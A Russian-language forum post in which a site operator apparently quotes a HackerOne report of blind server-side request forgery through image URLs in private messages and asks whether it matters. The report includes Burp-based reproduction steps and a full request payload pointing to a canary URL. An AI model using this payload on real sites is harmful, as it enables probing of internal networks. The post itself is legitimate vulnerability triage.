Мы получили отчет от HackerOne о проблеме ниже.
Меня интересует:
- Является ли это проблемой
- Есть ли какие-либо предложения / что я могу сделать по этому поводу
Краткое описание:
Здравствуйте, я обнаружил слепую SSRF на конечной точке
hxxps://xyz.com/postsШаги для воспроизведения:
- Войдите в свою учетную запись на xyz.com
- Перейдите в личные сообщения (там будет приветственное сообщение от их discobot)
- При отправке сообщения загрузите изображение и перехватите запрос в Burp
- В полезной нагрузке измените URL загрузки изображения на ваш URL canary
- Полезная нагрузка будет выглядеть следующим образом
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- При отправке запроса сработают два предупреждения canary, либо проверьте логи сервера: там будет запрос от пользовательского агента Ruby и один от экземпляра Amazon Compute
Влияние
Уязвимость позволяет злоумышленнику выполнять произвольные HTTP/HTTPS-запросы внутри сети экземпляра xyz.com.
Из этой ветки следует, что это связано с поведением onebox: Server-side request forgery vulnerability.
Я также видел этот отчет HackerOne от нескольких лет назад: SSRF при загрузке изображения через URL.
Спасибо!